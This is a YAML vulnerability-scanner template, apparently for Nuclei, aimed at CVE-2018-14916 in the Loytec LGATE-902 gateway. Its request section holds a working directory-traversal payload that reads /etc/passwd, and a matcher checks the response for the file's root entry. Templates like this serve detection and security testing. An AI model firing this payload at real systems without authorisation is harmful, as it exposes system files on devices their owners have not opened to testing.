33 lines
916 B
YAML
33 lines
916 B
YAML
id: CVE-2018-14916
|
|
|
|
info:
|
|
name: Loytec LGATE-902 Directory Traversal
|
|
author: 0x_Akoko
|
|
severity: critical
|
|
description: Loytec LGATE-902 versions prior to 6.4.2 suffer from cross site scripting, arbitrary file deletion, and directory traversal vulnerabilities.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-14916
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
|
|
cvss-score: 9.4
|
|
cve-id: CVE-2018-14916
|
|
cwe-id: CWE-732
|
|
tags: cve,cve2018,loytec,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|